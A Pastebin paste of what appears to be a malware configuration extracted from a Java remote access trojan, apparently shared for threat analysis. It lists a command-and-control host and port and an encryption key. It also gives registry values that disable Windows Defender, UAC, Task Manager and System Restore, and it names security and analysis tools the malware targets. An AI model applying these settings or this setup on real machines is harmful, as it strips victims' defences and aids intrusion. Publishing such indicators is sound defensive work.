James_inthe_box

Config

Dec 18th, 2019
15,531
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.93 KB | None | 0 0
  1. {
  2. "serverPath": "C:\\Users\\Larry\\AppData\\Roaming\\mzjipfvdtk.txt",
  3. "securityRetry": 20,
  4. "vbox": false,
  5. "serverVersion": "v1.0.1",
  6. "mainPath": "C:\\Users\\Larry\\JGMVI",
  7. "nickName": "BTC",
  8. "vmware": false,
  9. "encryptKey": "aitCHKJKhsvedAUApILrTqETU",
  10. "operatingSystem": {
  11. "osDefaultArch": "x86",
  12. "country": {
  13. "code": "us",
  14. "name": "United States"
  15. },
  16. "antivirus": "Windows Defender, ",
  17. "icon": "windows10",
  18. "admin": false,
  19. "language": "English (United States)",
  20. "type": 1,
  21. "processor": 4,
  22. "osDefaultName": "Windows 10",
  23. "computerUser": "Larry",
  24. "javaArchitecture": "x86",
  25. "computerName": "LARRY-ACCOUNTIN",
  26. "name": "Windows 10 Enterprise",
  27. "osDefaultVersion": "10.0",
  28. "jreVersion": "1.8.0_181",
  29. "architecture": "amd64",
  30. "ram": "7 GB"
  31. },
  32. "uuid": "6b828d04-e7fe-4f2f-a055-b2dca0699906",
  33. "command": 1,
  34. "network": [
  35. {
  36. "delay": 2,
  37. "port": 4083,
  38. "dns": "humblechrisj.loginto.me"
  39. }
  40. ],
  41. "jrePath": "C:\\Users\\Larry\\Oracle\\bin\\javaw.exe",
  42. "userTitle": "Larry@LARRY-ACCOUNTIN",
  43. "security": [
  44. {
  45. "code": "open-file-security",
  46. "reg": [
  47. {
  48. "value": "\"SaveZoneInformation\"=dword:00000001\r\n",
  49. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
  50. "valuesCommand": [
  51. {
  52. "name": "SaveZoneInformation",
  53. "valueCommand": "1",
  54. "valueCommandType": "REG_DWORD",
  55. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
  56. }
  57. ]
  58. },
  59. {
  60. "value": "\"LowRiskFileTypes\"=\".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;\"\r\n",
  61. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
  62. "valuesCommand": [
  63. {
  64. "name": "LowRiskFileTypes",
  65. "valueCommand": ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;",
  66. "valueCommandType": "REG_SZ",
  67. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
  68. }
  69. ]
  70. },
  71. {
  72. "value": "\"SaveZoneInformation\"=\"-\"\r\n",
  73. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments",
  74. "valuesCommand": [
  75. {
  76. "name": "SaveZoneInformation",
  77. "valueCommand": "-",
  78. "valueCommandType": "REG_SZ",
  79. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"
  80. }
  81. ]
  82. },
  83. {
  84. "value": "\"LowRiskFileTypes\"=\"-\"\r\n",
  85. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",
  86. "valuesCommand": [
  87. {
  88. "name": "LowRiskFileTypes",
  89. "valueCommand": "-",
  90. "valueCommandType": "REG_SZ",
  91. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"
  92. }
  93. ]
  94. }
  95. ],
  96. "name": {
  97. "en": "Open-File Security Warning"
  98. }
  99. },
  100. {
  101. "code": "disable-zone-checking",
  102. "reg": [
  103. {
  104. "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
  105. "key": "HKEY_CURRENT_USER\\Environment",
  106. "valuesCommand": [
  107. {
  108. "name": "SEE_MASK_NOZONECHECKS",
  109. "valueCommand": "1",
  110. "valueCommandType": "REG_SZ",
  111. "key": "HKEY_CURRENT_USER\\Environment"
  112. }
  113. ]
  114. },
  115. {
  116. "value": "\"SEE_MASK_NOZONECHECKS\"=\"1\"\r\n",
  117. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
  118. "valuesCommand": [
  119. {
  120. "name": "SEE_MASK_NOZONECHECKS",
  121. "valueCommand": "1",
  122. "valueCommandType": "REG_SZ",
  123. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
  124. }
  125. ]
  126. }
  127. ],
  128. "name": {
  129. "en": "Disable Zone Checking"
  130. }
  131. },
  132. {
  133. "process": [
  134. "UserAccountControlSettings.exe"
  135. ],
  136. "code": "user-account-control",
  137. "reg": [
  138. {
  139. "value": "\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n",
  140. "key": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
  141. "valuesCommand": []
  142. }
  143. ],
  144. "name": {
  145. "en": "User Account Control"
  146. }
  147. },
  148. {
  149. "process": [
  150. "Taskmgr.exe"
  151. ],
  152. "code": "task-manager",
  153. "reg": [
  154. {
  155. "value": "\"DisableTaskMgr\"=dword:00000002\r\n",
  156. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
  157. "valuesCommand": [
  158. {
  159. "name": "DisableTaskMgr",
  160. "valueCommand": "2",
  161. "valueCommandType": "REG_DWORD",
  162. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
  163. }
  164. ]
  165. }
  166. ],
  167. "name": {
  168. "en": "Task Manager"
  169. }
  170. },
  171. {
  172. "code": "restore-system",
  173. "reg": [
  174. {
  175. "value": "\"DisableConfig\"=dword:00000001\r\n\"DisableSR\"=dword:00000001\r\n",
  176. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore",
  177. "valuesCommand": [
  178. {
  179. "name": "DisableConfig",
  180. "valueCommand": "1",
  181. "valueCommandType": "REG_DWORD",
  182. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
  183. },
  184. {
  185. "name": "DisableSR",
  186. "valueCommand": "1",
  187. "valueCommandType": "REG_DWORD",
  188. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore"
  189. }
  190. ]
  191. }
  192. ],
  193. "name": {
  194. "en": "Restore System"
  195. }
  196. },
  197. {
  198. "process": [
  199. "ProcessHacker.exe"
  200. ],
  201. "code": "process-hacker",
  202. "name": {
  203. "en": "Process Hacker"
  204. }
  205. },
  206. {
  207. "process": [
  208. "procexp.exe"
  209. ],
  210. "code": "msconfig",
  211. "name": {
  212. "en": "MsConfig"
  213. }
  214. },
  215. {
  216. "process": [
  217. "MSASCuiL.exe",
  218. "MSASCui.exe",
  219. "MsMpEng.exe",
  220. "MpUXSrv.exe",
  221. "MpCmdRun.exe",
  222. "NisSrv.exe",
  223. "ConfigSecurityPolicy.exe"
  224. ],
  225. "code": "windows-defender",
  226. "reg": [
  227. {
  228. "value": "\"DisableAntiSpyware\"=dword:00000001\r\n",
  229. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender",
  230. "valuesCommand": [
  231. {
  232. "name": "DisableAntiSpyware",
  233. "valueCommand": "1",
  234. "valueCommandType": "REG_DWORD",
  235. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"
  236. }
  237. ]
  238. },
  239. {
  240. "value": "\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n",
  241. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  242. "valuesCommand": [
  243. {
  244. "name": "DisableBehaviorMonitoring",
  245. "valueCommand": "1",
  246. "valueCommandType": "REG_DWORD",
  247. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  248. },
  249. {
  250. "name": "DisableOnAccessProtection",
  251. "valueCommand": "1",
  252. "valueCommandType": "REG_DWORD",
  253. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  254. },
  255. {
  256. "name": "DisableScanOnRealtimeEnable",
  257. "valueCommand": "1",
  258. "valueCommandType": "REG_DWORD",
  259. "key": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
  260. }
  261. ]
  262. }
  263. ],
  264. "name": {
  265. "en": "Windows Defender"
  266. }
  267. },
  268. {
  269. "code": "windows-defender-exclusion",
  270. "name": {
  271. "en": "Windows Defender Exclusion"
  272. }
  273. },
  274. {
  275. "process": [
  276. "procexp.exe"
  277. ],
  278. "code": "process-explorer",
  279. "name": {
  280. "en": "Process Explorer"
  281. }
  282. },
  283. {
  284. "process": [
  285. "wireshark.exe",
  286. "tshark.exe",
  287. "text2pcap.exe",
  288. "rawshark.exe",
  289. "dumpcap.exe",
  290. "capinfos.exe"
  291. ],
  292. "code": "wireshark",
  293. "name": {
  294. "en": "Wireshark"
  295. }
  296. },
  297. {
  298. "process": [
  299. "Procmon.exe"
  300. ],
  301. "code": "process-monitor",
  302. "name": {
  303. "en": "Process Monitor"
  304. }
  305. },
  306. {
  307. "code": "avira",
  308. "name": {
  309. "en": "Avira"
  310. }
  311. },
  312. {
  313. "code": "eset",
  314. "name": {
  315. "en": "ESET Security"
  316. }
  317. },
  318. {
  319. "code": "bitdefender",
  320. "name": {
  321. "en": "Bitdefender"
  322. }
  323. },
  324. {
  325. "code": "malwarebytes",
  326. "name": {
  327. "en": "MalwareBytes"
  328. }
  329. },
  330. {
  331. "code": "adware-antivirus",
  332. "name": {
  333. "en": "Ad-Aware Antivirus"
  334. }
  335. },
  336. {
  337. "code": "bull-guard",
  338. "name": {
  339. "en": "Bull Guard Antivirus"
  340. }
  341. },
  342. {
  343. "code": "clamwin",
  344. "name": {
  345. "en": "ClamWin Antivirus"
  346. }
  347. },
  348. {
  349. "code": "comodo",
  350. "name": {
  351. "en": "COMODO Antivirus"
  352. }
  353. },
  354. {
  355. "code": "escan",
  356. "name": {
  357. "en": "EScan Antivirus"
  358. }
  359. },
  360. {
  361. "code": "f-secure",
  362. "name": {
  363. "en": "F-Secure Antivirus"
  364. }
  365. },
  366. {
  367. "code": "f-prot",
  368. "name": {
  369. "en": "F-PROT Antivirus"
  370. }
  371. },
  372. {
  373. "code": "gdata",
  374. "name": {
  375. "en": "G DATA Antivirus"
  376. }
  377. },
  378. {
  379. "code": "ikarus",
  380. "name": {
  381. "en": "IKARUS Antivirus"
  382. }
  383. },
  384. {
  385. "code": "immunet",
  386. "name": {
  387. "en": "Immunet Antivirus"
  388. }
  389. },
  390. {
  391. "code": "k7ultimate",
  392. "name": {
  393. "en": "K7 Security"
  394. }
  395. },
  396. {
  397. "code": "nano",
  398. "name": {
  399. "en": "NANO Antivirus"
  400. }
  401. },
  402. {
  403. "code": "panda",
  404. "name": {
  405. "en": "Panda Antivirus"
  406. }
  407. },
  408. {
  409. "code": "super-anti-spyware",
  410. "name": {
  411. "en": "SUPER Anti-Spyware"
  412. }
  413. },
  414. {
  415. "code": "trend-micro",
  416. "name": {
  417. "en": "Trend Micro Antivirus"
  418. }
  419. },
  420. {
  421. "code": "vipre-security",
  422. "name": {
  423. "en": "VIPRE"
  424. }
  425. },
  426. {
  427. "code": "mcshield",
  428. "name": {
  429. "en": "MCShield Anti-Malware Tool"
  430. }
  431. },
  432. {
  433. "code": "spybot",
  434. "name": {
  435. "en": "SPYBOT AntiMalware"
  436. }
  437. },
  438. {
  439. "code": "forti-client",
  440. "name": {
  441. "en": "FortiClient"
  442. }
  443. },
  444. {
  445. "code": "twister",
  446. "name": {
  447. "en": "Twister Antivirus"
  448. }
  449. },
  450. {
  451. "code": "quickheal",
  452. "name": {
  453. "en": "Quick Heal"
  454. }
  455. },
  456. {
  457. "code": "arcabit",
  458. "name": {
  459. "en": "Arcabit"
  460. }
  461. },
  462. {
  463. "code": "totaldefense",
  464. "name": {
  465. "en": "Total Defense"
  466. }
  467. },
  468. {
  469. "code": "emisoft",
  470. "name": {
  471. "en": "Emsisoft Anti-Malware"
  472. }
  473. },
  474. {
  475. "code": "zillya",
  476. "name": {
  477. "en": "Zillya"
  478. }
  479. },
  480. {
  481. "code": "tachyon",
  482. "name": {
  483. "en": "TACHYON"
  484. }
  485. },
  486. {
  487. "code": "trustport",
  488. "name": {
  489. "en": "TrustPort"
  490. }
  491. },
  492. {
  493. "code": "xvirus",
  494. "name": {
  495. "en": "Xvirus"
  496. }
  497. }
  498. ],
  499. "installDate": {
  500. "daysRunning": 0,
  501. "lastModified": 1576685577058
  502. },
  503. "installation": {
  504. "jarName": "YwJnB",
  505. "moduleFolder": "LLQcu",
  506. "moduleEntry": "ZgKdOtqwKDcUfsRZplMiNIZkxFWnZCITYRIQnhAneALQalUBbSKiRQTEZnabYjXvgbNikDvt/IuuMMwdSMVnSuTLnLWfJZHVtl/lPrxiOAajrPnmNDnqmSKZEIrZHYFhgESWDWQTMZjlTpjWXlNWebDvoNPUtQYDaUMBDxeJckICJJmRdLbtHlXKIQigeaR.lrQFnaCQPrXFFrlHwFMIxnnIHLTruYFGtsadPfVUcGjAZoJiTkKVwrAWWAGGmOZWKRqVwvc",
  507. "uniqueIDFile": ".ntusernt.ini",
  508. "delay": 2,
  509. "jreFolder": "Oracle",
  510. "active": true,
  511. "mainFolder": "JGMVI",
  512. "moduleExtension": "gGS",
  513. "jarExtension": "class",
  514. "jarRegistry": "UgYGDsA"
  515. },
  516. "localIp": "172.16.0.2"
  517. }
Add Comment
Please, Sign In to add comment